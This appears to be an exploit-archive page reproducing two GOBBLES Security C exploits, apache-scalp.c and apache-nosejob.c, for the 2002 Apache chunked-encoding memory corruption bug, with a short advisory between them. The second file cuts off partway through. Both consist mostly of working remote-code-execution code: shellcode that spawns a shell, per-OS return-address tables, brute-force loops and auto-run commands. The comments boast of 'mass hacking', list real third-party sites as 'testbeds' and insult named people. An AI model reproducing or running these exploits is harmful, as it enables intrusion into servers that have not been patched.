 * --- I hope Theo doesn't kill himself                        
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>                           
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
 * --- super@GOBBLES.NET (low-level.net)
 *
 * GOBBLES Security
 * GOBBLES@hushmail.com
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>


#define EXPLOIT_TIMEOUT		5	/* num seconds to wait before assuming it failed */
#define RET_ADDR_INC		512


#define MEMCPY_s1_OWADDR_DELTA	-146
#define PADSIZE_1		4
#define PADSIZE_2 		5
#define PADSIZE_3		7


#define REP_POPULATOR		24
#define REP_RET_ADDR		6
#define REP_ZERO		36
#define REP_SHELLCODE		24
#define NOPCOUNT		1024

#define NOP			0x41
#define PADDING_1		'A'
#define PADDING_2		'B'
#define PADDING_3		'C'

#define PUT_STRING(s)		memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)		memset(p, b, n); p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =
  "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
  "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
  "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
  "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
  "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
  "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
  "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
  "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
  "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";


struct {
	char *type;
	u_long retaddr;
} targets[] = {	// hehe, yes theo, that say OpenBSD here!
	{ "OpenBSD 3.0 x86 / Apache 1.3.20",	0xcf92f },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22",	0x8f0aa },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20",	0x8f2a6 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24",	0x9011a },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",	0x932ae },
};


int main(int argc, char *argv[]) {

	char           *hostp, *portp;
	unsigned char   buf[512], *expbuf, *p;
	int             i, j, lport;
	int             sock;
	int             bruteforce, owned, progress;
	u_long          retaddr;
	struct sockaddr_in sin, from;


	if(argc != 3) {
		printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
		printf("  Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
		printf("  Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
		printf("\n--- --- - Potential targets list - --- ----\n");
		printf("Target ID / Target specification\n");
		for(i = 0; i < sizeof(targets)/8; i++)
			printf("\t%d / %s\n", i, targets[i].type);

		return -1;
	}


	hostp = strtok(argv[2], ":");
	if((portp = strtok(NULL, ":")) == NULL)
		portp = "80";

	retaddr = strtoul(argv[1], NULL, 16);
	if(retaddr < sizeof(targets)/8) {
		retaddr = targets[retaddr].retaddr;
		bruteforce = 0;
	}
	else
		bruteforce = 1;
		

	srand(getpid());
	signal(SIGPIPE, SIG_IGN);
	for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {

		/* skip invalid return adresses */
		i = retaddr & 0xff;
		if(i == 0x0a || i == 0x0d)
			retaddr++;
		else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
			continue;


		sock = socket(AF_INET, SOCK_STREAM, 0);
		sin.sin_family = AF_INET;
		sin.sin_addr.s_addr = inet_addr(hostp);
		sin.sin_port = htons(atoi(portp));
		if(!progress)
			printf("\n[*] Connecting.. ");

		fflush(stdout);
		if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
			perror("connect()");
			exit(1);
		}

		if(!progress)
			printf("connected!\n");


		/* Setup the local port in our shellcode */
		i = sizeof(from);
		if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
			perror("getsockname()");
			exit(1);
		}

		lport = ntohs(from.sin_port);
		shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
		shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;


		p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
				    + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));

		PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");

		for (i = 0; i < REP_SHELLCODE; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_3, PADDING_3);
			PUT_STRING(": ");
			PUT_BYTES(NOPCOUNT, NOP);
			memcpy(p, shellcode, sizeof(shellcode) - 1);
			p += sizeof(shellcode) - 1;
			PUT_STRING("\r\n");
		}

		for (i = 0; i < REP_POPULATOR; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_1, PADDING_1);
			PUT_STRING(": ");
			for (j = 0; j < REP_RET_ADDR; j++) {
				*p++ = retaddr & 0xff;
				*p++ = (retaddr >> 8) & 0xff;
				*p++ = (retaddr >> 16) & 0xff;
				*p++ = (retaddr >> 24) & 0xff;
			}

			PUT_BYTES(REP_ZERO, 0);
			PUT_STRING("\r\n");
		}

		PUT_STRING("Transfer-Encoding: chunked\r\n");
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
		PUT_STRING(buf);
		PUT_BYTES(PADSIZE_2, PADDING_2);
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
		PUT_STRING(buf);

		write(sock, expbuf, p - expbuf);

		progress++;
		if((progress%70) == 0)
			progress = 1;

		if(progress == 1) {
			memset(buf, 0, sizeof(buf));
			sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
				retaddr, (unsigned int)(p - expbuf), lport);
			memset(buf + strlen(buf), ' ', 74 - strlen(buf));
			puts(buf);
			if(bruteforce)
				putchar(';');
		}
		else
			putchar((rand()%2)? 'P': 'p');


		fflush(stdout);
		while (1) {
			fd_set          fds;
			int             n;
			struct timeval  tv;

			tv.tv_sec = EXPLOIT_TIMEOUT;
			tv.tv_usec = 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);

			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
				if(FD_ISSET(sock, &fds)) {
					if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
						break;

					if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
						printf("\nGOBBLE GOBBLE!@#%%)*#\n");
						printf("retaddr 0x%lx did the trick!\n", retaddr);
						sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
						write(sock, expbuf, strlen(expbuf));
						owned++;
					}

					write(1, buf, n);
				}

				if(FD_ISSET(0, &fds)) {
					if((n = read(0, buf, sizeof(buf) - 1)) < 0)
						exit(1);

					write(sock, buf, n);
				}
			}

			if(!owned)
				break;
		}

		free(expbuf);
		close(sock);

		if(owned)
			return 0;

		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}

	return 0;
}
		

- 漏洞信息 (21560)

Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2) (EDBID:21560)
multiple remote
2002-06-17 Verified
0 Gobbles Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/5033/info
 
When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.
 
**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.

/*
 * apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>
 *
 * !! THIS EXPLOIT IS NOW PRIVATE ON BUGTRAQ !!
 *
 * USE BRUTE FORCE ! "AUTOMATED SCRIPT KIDDY" ! USE BRUTE FORCE !
 *
 * YEZ!$#@ YOU CAN EVEN DEFACE BUGTRAQ.ORG! 
 *
 * Your high priced security consultant's plane ticket: $1500
 * Your high priced security consultant's time: $200/hour
 * RealSecure nodes all over your company: $200,000
 * Getting owned by 0day: Priceless
 *  
 * * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR *
 * If somebody could do us a big favor and contact Jennifer Garner and ask
 * her to make a journey to Vegas this summer for Defcon, to hang out with
 * the members of GOBBLES Security who are all huge fans of hers, we would
 * be eternally grateful.  We are 100% serious about this.  We would love 
 * to have a chance to sit down and have a nice conversation with her during
 * the conference -- something little to make our lives feel more complete.
 *
 * Just show her this picture, and she'll understand that we're not some
 * crazy obsessive fanatical lunatics that she would want to avoid. ;-)
 * 		http://phrack.org/summercon2002/GOBBLES_show.jpg
 * We even promise to keep our clothes on!
 *
 * Thx to all those GOBBLES antagonizers. Your insults fuel our desire to
 * work harder to gain more fame.
 *
 * This exploit brought to you by a tagteam effort between GOBBLES Security
 * and ISS X-Forces.  ISS supplied the silly mathematical computations and
 * other abstract figures declaring the exploitation of this bug to be 
 * impossible, without factoring in the chance that there might be other
 * conditions present that would allow exploitation.  After the failure of
 * ISS' Santa Claus, GOBBLES Security didn't want to disappoint the kids and
 * the security consultants and have brought forth a brand new shiny toy for
 * all to marvel at.
 *
 * GOBBLES Security Sex Force:  A lot of companies like to let you know
 * their employees have the biggest dicks.  We're firm believers in the 
 * idea that it's not the size of the wave, but rather the motion of the
 * ocean -- we have no choice anyway.
 * 
 * 3APAPAPA said this can't be done on FreeBSD. He probably also thinks
 * qmail can't be exploited remotely. Buzzz! There we go speaking through
 * our asses again.  Anyways we're looking forward to his arguments on why
 * this isn't exploitable on Linux and Solaris.  Lead, follow, or get the 
 * fuck out of the way.
 *
 * Weigh the chances of us lying about the Linux version. Hmm, well so far
 * we've used a "same shit, different smell" approach on *BSD, so you could
 * be forgiven for thinking we have no Linux version. Then bring in the
 * reverse psychology factor of this paragraph that also says we don't have
 * one. But we'd say all of the above to make you believe us. This starts to
 * get really complicated.
 *
 * --- 
 * God knows I'm helpless to speak
 * On my own behalf
 * God is as helpless as me
 * Caught in the negatives
 * We all just do as we please
 * False transmissions
 * I hope God forgives me
 * For my transgressions
 *
 * It's what you want
 * To know no consequences
 * It's what you need
 * To fucking bleed
 * It's all too much
 * ---
 * 
 * Changes:
 * + can do hostname resolution
 * + uses getopt() 
 * + works against freebsd and netbsd now
 * + ability to execute custom commands when shellcode replies -- great for
 *   mass hacking
 * + rand() value bitshifted for more randomness in our progress bar tongues
 * + more targets ;> BUT REMEMBER BRUTE FORCE MODE!!!
 * + [RaFa] complained that the first version didn't let him hack through
 *   proxies.  New shellcode has been added for additional fun.  It's real
 *   funky, monkey, do you trust?  Didn't think so.
 *
 * Fun to know:
 * + Most apache installations don't even log the attack
 * + GOBBLES Security is not playing games anymore.
 * + GOBBLES Security has more active members than w00w00.
 * + w00w00.org is still vulnerable to this exploit.
 * + w00w00 might release another AIM advisory soon about how evil the
 *   whole DMCA thing is.  *yawn*
 * 
 * Fun to do:
 * + Spot the #openbsd operator who can figure out how to use this!
 * + Join #snort and laugh at their inadequacies
 * + Question the effectiveness of Project Honeynet, when they have yet
 *   to discover the exploitation of a single "0day" vulnerability in the
 *   wild.  HURRY UP B0YZ 4ND H4CK Y0UR 0WN H0N3YP0TZ N0W W1TH 4LL Y0UR
 *   0DAY T0 PR0V3 US WR0NG!!@#  Dumb twats.
 *
 * 80% of #openbsd won't be patching Apache because:
 * + "It's not in the default install"
 * + "It's only uid nobody. So what?"
 * + "Our memcpy() implementation is not buggy"
 * + "I couldn't get the exploit to work, so it must not actually be
 *    exploitable.  Stupid GOBBLES wasting my time with nonsense"
 * + jnathan's expert advice to his peers is that "this is not much of
 *   a security issue" -- @stake + w00w00 + snort brain power in action!
 *
 * Testbeds: hotmail.com, 2600.com, w00w00.org, efnet.org, atstake.com,
 *	     yahoo.com, project.honeynet.org, pub.seastrom.com
 *
 * !! NOTICE TO CRITICS !! NOTICE TO CRITICS !! NOTICE TO CRITICS !!
 * 
 * If you're using this exploit against a vulnerable machine (that the
 * exploit is supposed to work on, quit mailing us asking why apache-scalp
 * doesn't work against Linux -- dumbasses) and it does not succeed, you
 * will have to play with the r|d|z values and * BRUTEFORCE * BRUTEFORCE * 
 * * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE *
 * 
 * We wrote this for ethical purposes only.  There is such a thing as an
 * "ethical hacker" right?
 *
 * This should make penetration testing _very_ easy.  Go out and make some
 * money off this, by exploiting the ignorance of some yahoo who will be
 * easily ./impressed with your ability to use gcc.  No, we won't provide
 * you with precompiled binaries.  Well, at least for *nix. ;-) 
 *
 * * IMPORTANT ANNOUCEMENT * IMPORTANT ANNOUNCEMENT * IMPORTANT ANNOUCEMENT *
 * --- GOBBLES Security is no longer accepting new members.  We're now a 
 *     closed group.  Of course, we'll still share our warez with the 
 *     community at large, but for the time we have enough members.  
 *
 *     Greets to our two newest members:
 *	-[RaFa], Ambassador to the Underworld
 *	-pr0ix, Director of Slander and Misinformation
 *
 * [#!GOBBLES@SECRET_SERVER QUOTES]
 *
 * --- i wont be surprised that when I return tomorrow morning the
 *     internet will have come to a grinding halt with people crying for
 *     medics
 * --- the internet will be over in a couple of months 
 * --- nobody in #openbsd can get it to work... #netbsd people seem to be
 *     managing fine...  
 * --- they dont grasp the concept of the base address... i seriously
 *     thought this was the most kiddie friendly exploit ever released
 * --- even bb could get it working. look at vuln-dev
 * --- we have to try to bump that threatcon up a notch
 * --- what the alldas url now? how many defacements appeared yet?
 * --- we should do a poem entitled "default openbsd" and mention how
 *     it just sits there... inanimate... soon theo will be stripping the
 *     network code so not even gobkltz.c works... as theo's paranoia
 *     increases and he becomes out of sync with the real world, strange
 *     things start to happen with openbsd...  CHANGELOG: "now also safe
 *     from the voices. 6 years without the screaming in the default
 *     install"
 * --- i can port it to windows.. i can make a gui using mfc.. with
 *     a picture of the skull & crossbones 
 * --- Has anyone ever been caught by an IDS? I certainly never have.
 *     This one runs on many machines. It ports to HP-UX.
 * --- strange how mr spitzner didn't know honeynet.org was owned
 * --- an official openbsd mirror is still vulnerable?  dear god they're
 *     out of it!
 * --- I think we're finally famous.
 * --- we're on the front page of securityfocus, and we didn't even have 
 *     to deface them!  too bad the article wasn't titled, "Hi BlueBoar!"
 * --- we need GOBBLES group photos at defcon holding up signs that say
 *     "The Blue Boar Must Die"
 * --- project.honeynet.org is _still_ vulnerable a day after the exploit
 *     was made public?  hahaha!
 * --- exploit scanner?  www.google.com -- search for poweredby.gif + your
 *     *bsd of choice!
 * --- i stopped taking my antipsychotics last night.  say no 2 drugz!
 * --- <GOBBLES> antiNSA -- HACKING IS NOT FOR YOU!!!!!!
 * --- we wonder how much they'll like GeneralCuster.exe 
 * --- wonder if ISS will use our code in their "security assesment" 
 *     audits, or if they'll figure out how to exploit this independantly.
 *     either way they're bound to make a lot of money off us, bastards.
 * --- forget w00giving, this year itz thanksgiving.
 * --- the traffic to netcraft.com/whats will be through the roof for the
 *     next few months!
 * --- every company with a hub has been sold multiple realsensor units
 * --- full disclosure is a necessary evil, so quit your goddamned whining.
 * --- people just assume they know what we mean by "testbed"
 * --- i can't believe that people still disbelieve in the existance of 
 *     hackers... i mean, what is all this bullshit about people being 
 *     shocked that hackers write programs to break into systems so that
 *     they can use those programs to break into systems?  are their minds
 *     that small?
 * --- we're far from done. . .
 *
 */

/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 
 * 
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 * 
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great. 
 *
 * [#!GOBBLES QUOTES]
 * 
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *      package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?       
 * --- I hope Theo doesn't kill himself                        
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>                           
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
 * --- super@GOBBLES.NET (low-level.net)
 *
 * GOBBLES Security
 * GOBBLES@hushmail.com
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif


#define HOST_PARAM	"apache-nosejob.c"		/* The Host: field */
#define DEFAULT_CMDZ	"uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define RET_ADDR_INC	512


#define PADSIZE_1	4
#define PADSIZE_2 	5
#define PADSIZE_3	7


#define REP_POPULATOR	24
#define REP_SHELLCODE	24
#define NOPCOUNT	1024

#define NOP		0x41
#define PADDING_1	'A'
#define PADDING_2	'B'
#define PADDING_3	'C'

#define PUT_STRING(s)	memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)	memset(p, b, n); p += n;

char shellcode[] =
  "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
  "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
  "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
  "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
  "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
  "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
  "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
  "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
  "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
  "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
  "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
  "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
  "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
  "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
  "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
;

struct {
	char *type;		/* description for newbie penetrator */
	int delta;		/* delta thingie! */
	u_long retaddr;		/* return address */
	int repretaddr;		/* we repeat retaddr thiz many times in the buffer */
	int repzero;		/* and \0'z this many times */
} targets[] = {	// hehe, yes theo, that say OpenBSD here!
	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80f3a00, 6, 36 },
	{ "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)",	 -150,	0x80a7975, 6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.20",		 -146,	0xcfa00,   6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22",		 -146,	0x8f0aa,   6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24",		 -146,	0x90600,   6, 36 },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24 #2",		 -146,	0x98a00,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20",		 -146,	0x8f2a6,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23",		 -146,	0x90600,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24",		 -146,	0x9011a,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",		 -146,	0x932ae,   6, 36 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146,	0x1d7a00,  6, 36 },
	{ "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)",	 -90,	0x80eda00,  5, 42 },
	{ "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", 	 -90,   0x80efa00,  5, 42 },
	{ "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", 	 -90,   0x80efa00,  5, 42 },	
	{ "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)",	 -90,	0x80efa00,  5, 42 }, 
	{ "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)",	 -90,	0x80efa00,  5, 42 },
}, victim;



void usage(void) {
	int i;

	printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
	printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n");
	printf("  -h host[:port]\tHost to penetrate\n");
	printf("  -t #\t\t\tTarget id.\n");
	printf("  Bruteforcing options (all required, unless -o is used!):\n");
	printf("  -o char\t\tDefault values for the following OSes\n");
	printf("  \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
	printf("  -b 0x12345678\t\tBase address used for bruteforce\n");
	printf("  \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
	printf("  -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
	printf("  \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
	printf("  -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
	printf("  \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
	printf("  -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
	printf("  \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
	printf("  Optional stuff:\n");
	printf("  -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n");
	printf("  -c cmdz\t\tCommands to execute when our shellcode replies\n");
	printf("  \t\t\taka auto0wncmdz\n");
	printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n");
	printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
	printf(" ID / Return addr / Target specification\n");
	for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
		printf("% 3d /  0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type);

	exit(1);
}


int main(int argc, char *argv[]) {
	char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
	u_char buf[512], *expbuf, *p;
	int i, j, lport, sock;
	int bruteforce, owned, progress, sc_timeout = 5;
	int responses, shown_length = 0;
	struct in_addr ia;
	struct sockaddr_in sin, from;
	struct hostent *he;


	if(argc < 4)
		usage();

	bruteforce = 0;
	memset(&victim, 0, sizeof(victim));
	while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
		switch(i) {
			/* required stuff */
			case 'h':
			hostp = strtok(optarg, ":");
			if((portp = strtok(NULL, ":")) == NULL)
				portp = "80";
			break;

			/* predefined targets */
			case 't':
			if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
				printf("Invalid target\n");
				return -1;
			}

			memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
			break;

			/* bruteforce! */
			case 'b':
			bruteforce++;
			victim.type = "Custom target";
			victim.retaddr = strtoul(optarg, NULL, 16);
			printf("Using 0x%lx as the baseadress while bruteforcing..\n", victim.retaddr);
			break;

			case 'd':
			victim.delta = atoi(optarg);
			printf("Using %d as delta\n", victim.delta);
			break;

			case 'r':
			victim.repretaddr = atoi(optarg);
			printf("Repeating the return address %d times\n", victim.repretaddr);
			break;

			case 'z':
			victim.repzero = atoi(optarg);
			printf("Number of zeroes will be %d\n", victim.repzero);
			break;

			case 'o':
			bruteforce++;
			switch(*optarg) {
				case 'f':
				victim.type = "FreeBSD";
				victim.retaddr = 0x80a0000;
				victim.delta = -150;
				victim.repretaddr = 6;
				victim.repzero = 36;
				break;

				case 'o':
				victim.type = "OpenBSD";
				victim.retaddr = 0x80000;
				victim.delta = -146;
				victim.repretaddr = 6;
				victim.repzero = 36;
				break;

				case 'n':
				victim.type = "NetBSD";
				victim.retaddr = 0x080e0000;
				victim.delta = -90;
				victim.repretaddr = 5;
				victim.repzero = 42;
				break;

				default:
				printf("[-] Better luck next time!\n");
				break;
			}
			break;

			/* optional stuff */
			case 'w':
			sc_timeout = atoi(optarg);
			printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout);
			break;

			case 'c':
			cmdz = optarg;
			break;

			default:
			usage();
			break;
		}
	}

	if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {
		printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n");
		return -1;
	}

	printf("[*] Resolving target host.. ");
